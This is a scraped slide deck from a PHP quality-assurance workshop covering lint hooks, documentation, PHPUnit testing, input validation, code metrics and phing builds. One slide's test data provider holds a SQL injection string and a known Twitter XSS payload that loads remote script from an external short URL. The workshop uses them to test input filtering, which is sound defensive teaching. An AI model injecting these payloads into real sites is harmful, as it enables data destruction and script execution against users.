QA for PHP projects

1. QA for PHP projects in it2PROFESSIONAL PHP SERVICES

2. Requirements • VirtualBox http://virtualbox.com • Vagrant https://vagrantup.com • Copy of https://github.com/in2it/phpqa-workshop • Copy of https://github.com/in2it/phpqa-testing

3. Michelangelo van Dam! ! PHP Consultant Community Leader President of PHPBenelux Contributor to PHP projects ! T @DragonBe | F DragonBe https://www.ﬂickr.com/photos/akrabat/8784318813

4. Using Social Media? Tag it #phpqa http://www.ﬂickr.com/photos/andyofne/4633356197 http://www.ﬂickr.com/photos/andyofne/4633356197

5. What is QA? Testing Measuring Automation

6. What is QA? https://www.ﬂickr.com/photos/inﬁdelic/4306205887

7. Detect bugs early https://www.ﬂickr.com/photos/goingslo/4523034319

8. Observe behaviour https://www.ﬂickr.com/photos/yuan2003/1812881370

9. Prevent mistakes https://www.ﬂickr.com/photos/robertelyov/5159801170

10. Track progress https://www.ﬂickr.com/photos/dingatx/4115844000

11. Important QA tools https://www.ﬂickr.com/photos/ﬂorianric/7263382550

12. Version Control https://www.ﬂickr.com/photos/mrmyle/2327686010

13. Subversion

14. GIT

15. GitHub

16. Bitbucket

17. Mercurial

18. Bazaar

19. Perforce

20. Team Foundation Server

21. File Transfer Protocol FTP

22. Advantages of SCM • Team development • Multi-versions management • Keep track of history • Tagging milestones • Backup of source code • Full integration https://www.ﬂickr.com/photos/skoop/5397232723

23. Exercise • Start a new project “phpqa-intro” • Initialise it as a GIT project • Create a “hello world” php script • Add it to the repository & commit

24. Possible answer $ cd workspace $ mkdir phpqa-intro $ cd phpqa-intro $ git init $(master #) echo "<?php echo 'Hello World'; . PHP_EOL" > helloworld.php $(master #) git add helloworld.php $(master #) git commit -m 'Initial version of helloworld' [master (root-commit) 174c675] Initial commit of helloworld 1 file changed, 1 insertion(+) create mode 100644 helloworld.php $(master)

25. Syntax Checking https://www.ﬂickr.com/photos/rooreynolds/4133549889

26. PHP Lint Build-in PHP!

27. PHP Lint php -l <ﬁlename>

28. GIT pre-commit hook https://github.com/ReekenX/phpcheck-git

29. Exercise • Download the pre-commit hook from http://in2.se/ phplintgit (or get it from the USB drive) • Make sure you make it executable • Create a syntax error in error.php and commit it • See you get the error and ensure the ﬁle is not committed.

30. Possible answer $(master) git checkout -b phplint $(phplint) wget -O .git/hooks/pre-commit http://in2.se/phplintgit $(phplint) chmod ugo+x .git/hooks/pre-commit $(phplint) echo "<?php echo 'Hello error' . PHP_EOL" > error.php $(phplint) git add error.php $(phplint +) git commit -m 'Trying to add code with errors' Syntax errors found in file: error.php ! Found PHP parse errors: PHP Parse error: parse error, expecting `','' or `';'' in /Users/ dragonbe/workspace/phpqa-intro/error.php on line 2 Parse error: parse error, expecting `','' or `';'' in /Users/dragonbe/workspace/phpqa- intro/error.php on line 2 ! PHP parse errors found. Fix errors and commit again. $(phplint +)

31. Documentation https://www.ﬂickr.com/photos/jankunst/6478327983

32. Why providing docblocks? • Useful information about the class, method or logic • Provides hints in IDE’s • Great reference for • New team members • 3rd party developers https://www.ﬂickr.com/photos/mundoo/2293493420

33. phpDocumentor http://phpdoc.org

34. PHAR:// http://phpdoc.org/phpDocumentor.phar Other installations: Composer, PEAR, Source

35. Exercise • Create a class with a couple of methods (or use the class in “exercise/MyClass.php”) • Run phpdoc against this class ./vendor/bin/phpdoc -‐d exercise/phpdoc -‐t build/phpdoc • See the resulting documentation ﬁles at http:// 192.168.166.166/phpdoc

36. Testing https://www.ﬂickr.com/photos/akrabat/8421560178

37. Most common excuses why developers don’t test • no time • no budget • deliver tests after ﬁnish project (never) • devs don’t know how https://www.ﬂickr.com/photos/dasprid/8147986307

38. No excuses! https://www.ﬂickr.com/photos/akrabat/8421560178

39. Let’s get started https://www.ﬂickr.com/photos/ﬂoridamemory/3295406193

40. PHPUnit & Composer { "require": { "php": "<=5.5.0" }, "require-‐dev": { "phpunit/phpunit": "~4.4" }, }

41. phpunit.xml <?xml version="1.0" encoding="UTF-‐8"?> ! <phpunit bootstrap="./vendor/autoload.php" colors="true" strict="true" stopOnError="true" stopOnFailure="true"> ! <testsuite name="PHPQA Workshop TestSuite"> <directory>./tests</directory> </testsuite> ! </phpunit>

42. Testing models https://www.ﬂickr.com/photos/fdecomite/2710132377

43. Simple Comment Class

44. CommentTest <?php namespace PhpqaTestsModel; ! use PhpqaModelComment; ! class CommentTest extends PHPUnit_Framework_TestCase { public function testModelIsPopulatedAtConstruct() { $data = [ 'commentId' => 1, 'fullName' => 'Johny Test', 'emailAddress' => 'johny.test@example.com', 'website' => 'http://johnytest.com', 'comment' => 'This is a comment', ]; ! $comment = new Comment($data); $this-‐>assertSame($data['commentId'], $comment-‐>getCommentId()); $this-‐>assertSame($data['fullName'], $comment-‐>getFullName()); $this-‐>assertSame($data['emailAddress'], $comment-‐>getEmailAddress()); $this-‐>assertSame($data['website'], $comment-‐>getWebsite()); $this-‐>assertSame($data['comment'], $comment-‐>getComment()); } }

47. CodeCoverage

48. Exercise • Test Comment class that you can convert it directly into an array • BONUS: Also test you can convert it into JSON

49. Testing Databases https://www.ﬂickr.com/photos/shindotv/3835365695

50. A few remarks • Testing against databases is “integration testing” • Testing against databases is slow • Testing against databases is only useful for • triggers & stored procedures • correct encoding and collations

51. Data is just “Data”

52. fzaninotto / Faker https://github.com/fzaninotto/Faker

53. Generated data /** * Provides data that we consider to be safe and of quality * @return array */ public function goodDataProvider() { $faker = FakerFactory::create(); $data = []; for ($iter = 0; $iter < 500; $iter++) { $data[] = [ 'commentId' => rand(1, time()), 'fullName' => $faker-‐>name, 'emailAddress' => $faker-‐>email, 'website' => $faker-‐>url, 'comment' => $faker-‐>text(), ]; } return $data; }

54. Modify our test /** * @dataProvider goodDataProvider */ public function testModelIsPopulatedAtConstruct($data) { $comment = new Comment($data); $this-‐>assertSame($data['commentId'], $comment-‐>getCommentId()); $this-‐>assertSame($data['fullName'], $comment-‐>getFullName()); $this-‐>assertSame($data['emailAddress'], $comment-‐>getEmailAddress()); $this-‐>assertSame($data['website'], $comment-‐>getWebsite()); $this-‐>assertSame($data['comment'], $comment-‐>getComment()); }

56. https://www.ﬂickr.com/photos/boltofblue/5724934828

57. http://xkcd.com/327/ Little Bobby Tables

58. Is this your project?

59. OWASP Top 10 https://www.owasp.org/index.php/Top_10_2013-Top_10

60. Bad Data provider http://en.wikipedia.org/wiki/Computer_virus

61. First modify our class <?php namespace PhpqaModel; ! use ZendInputFilterInputFilter; use ZendInputFilterInput; use ZendFilter; use ZendValidator; ! class Comment { /** * @var InputFilter */ protected $inputFilter; /** * @return InputFilter */ public function getInputFilter() { // Lazy loading of filter and validation rules if (null === $this-‐>inputFilter) { } return $this-‐>inputFilter; }

62. Filter/Validate $commentId = new Input('commentId'); $commentId-‐>getFilterChain() -‐>attach(new FilterInt()); $commentId-‐>getValidatorChain() -‐>attach(new ValidatorGreaterThan(['min' => 0])); ! $fullName = new Input('fullName'); $fullName-‐>getFilterChain() -‐>attach(new FilterStringTrim()) -‐>attach(new FilterStripTags()) -‐>attach(new FilterHtmlEntities()); $fullName-‐>getValidatorChain() -‐>attach(new ValidatorNotEmpty()) -‐>attach(new ValidatorStringLength(['min' => 5, 'max' => 150]));

63. Filter/Validate (2) $emailAddress = new Input('emailAddress'); $emailAddress-‐>getFilterChain() -‐>attach(new FilterStringToLower()); $emailAddress-‐>getValidatorChain() -‐>attach(new ValidatorNotEmpty()) -‐>attach(new ValidatorEmailAddress()); ! $website = new Input('website'); $website-‐>getFilterChain() -‐>attach(new FilterStringToLower()); $website-‐>getValidatorChain() -‐>attach(new ValidatorUri()); ! $comment = new Input('comment'); $comment-‐>getFilterChain() -‐>attach(new FilterStripTags()) -‐>attach(new FilterHtmlEntities());

64. InputFilter $inputFilter = new InputFilter(); $inputFilter-‐>add($commentId) -‐>add($fullName) -‐>add($emailAddress) -‐>add($website) -‐>add($comment); ! $this-‐>setInputFilter($inputFilter);

65. badDataProvider /** * Provides data that we consider to be unsafe * @return array */ public function badDataProvider() { return [ [ [ 'commentId' => 0, 'fullName' => '', 'emailAddress' => '', 'website' => '', 'comment' => '', ] ],[ [ 'commentId' => 'Little Bobby Tables', 'fullName' => 'Robert'); DROP TABLE `students`; -‐-‐', 'emailAddress' => 'clickjack@hackers', 'website' => "http://t.co/@"style="font-‐size:999999999999px;"onmouseover= "$.getScript('http:u002fu002fis.gdu002ffl9A7')"/", 'comment' => 'exploit twitter 9/21/2010', ] ], ]; }

66. our bad data test /** * @dataProvider badDataProvider */ public function testCommentIsProtectedAgainstHacks($data) { $comment = new Comment(); $comment-‐>getInputFilter()-‐>setData($data); $this-‐>assertFalse($comment-‐>getInputFilter()-‐>isValid()); }

68. Exercise • Add some more “badData” entries • See if the validation rules hold • Test one of the latest exploits

69. Wanna know more… Come and see me after the workshop

70. Measuring https://www.ﬂickr.com/photos/batega/2056949264

71. pdepend

72. • CYCLO: Cyclomatic Complexity • LOC: Lines of Code • NOM: Number of Methods • NOC: Number of Classes • NOP: Number of Packages • AHH: Average Hierarchy Height • ANDC: Average Number of Derived Classes • FANOUT: Number of Called Classes • CALLS: Number of Operation Calls pDepend info

73. • metric calculation • execution paths • independent control structures • if, else, for, foreach, switch case, while, do, … • within a single method or function • more info   http://en.wikipedia.org/wiki/Cyclomatic_complexity Cyclomatic Complexity

74. • The average of the maximum length from a root class to its deepest subclass Average Hierarchy Height

75. Pyramid Inheritance few classes derived from other classes lots of classes inherit from other classes Inheritance

76. Pyramid complexity Size and complexity

77. Pyramid Coupling Coupling

78. pDepend-graph

82. PHP Mess Detection https://www.ﬂickr.com/photos/avlxyz/2145112149

83. What? • detects code smells • possible bugs • sub-optimal code • over complicated expressions • unused parameters, methods and properties • wrongly named parameters, methods or properties

84. Example output ./vendor/bin/phpmd exercise/ html cleancode,codesize,controversial,design,naming,unusedcode --reportﬁle ./ build/logs/phpmd.html

85. Copy/Paste Detection https://www.ﬂickr.com/photos/kalexanderson/6113247118

86. What? • detects similar code snippets • plain copy/paste work • similar code routines • indicates problems • maintenance hell • downward spiral of disasters • stimulates improvements • refactoring of code • moving similar code snippets in common routines

88. PHP_CodeSniffer https://www.ﬂickr.com/photos/create_up/3475195695

89. What? • validates coding standards • consistency • readability • set as a policy for development • reports failures to meet the standard • sometimes good: parentheses on wrong line • mostly bad: line exceeds 80 characters • but needed for terminal viewing of code • can be set as pre-commit hook • but can cause frustration!!!

91. Exercise • Run the following commands against “MyClass” • pdepend • phpmd • phpcpd • phpcs (php_CodeSniffer) • What is the result?

92. Automation https://www.ﬂickr.com/photos/freefoto/5982549938

93. Using phing The PHP builder http://phing.info

94. build.xml <?xml version="1.0" encoding="UTF-‐8"?> <project name="PHPQA Workshop" default="build"> <fileset dir="${project.basedir}" id="files"> <include name="${project.basedir}/exercise/**"/> </fileset> <target name="php-‐lint" description="Run syntax checking on the codebase"> <phplint> <fileset refid="files"/> </phplint> </target> <target name="php-‐doc" description="Generate automated documentation"> <exec command="./vendor/bin/phpdoc run -‐d exercise/ -‐t build/phpdoc/" dir="${project.basedir}"/> </target> <!-‐-‐ ... -‐-‐> <target name="build" description="The build process"> <phingcall target="php-‐lint"/> <phingcall target="php-‐doc"/> <phingcall target="php-‐depend"/> <phingcall target="php-‐md"/> <phingcall target="php-‐cpd"/> <phingcall target="php-‐cs"/> </target> </project>

95. Beneﬁts • Everyone executes the processes the same • Including automated CI tools • Once a new “target” is deﬁned, it’s available

96. There’s more with phing • auto upgrade databases • warming up caches • deploy over multiple nodes • collect statistics • perform benchmark/performance tests • …

97. Easy CI integration • Jenkins CI • JetBrains TeamCity • Atlassian Bamboo • ContinuousPHP

102. https://www.ﬂickr.com/photos/lwr/13442542235

103. Contact us in it2PROFESSIONAL PHP SERVICES Michelangelo van Dam michelangelo@in2it.be ! www.in2it.be PHP Consulting - Training - QA

104. Join the fun! PHPBENELUX phpbenelux.eu

105. Thank you Have a great conference http://www.ﬂickr.com/photos/drewm/3191872515

QA for PHP projects

QA for PHP projects

Recommended

More Related Content

What's hot

What's hot(20)

Viewers also liked

Viewers also liked(18)

Similar to QA for PHP projects

Similar to QA for PHP projects(20)

More from Michelangelo van Dam

More from Michelangelo van Dam(20)

Recently uploaded

Recently uploaded(20)

QA for PHP projects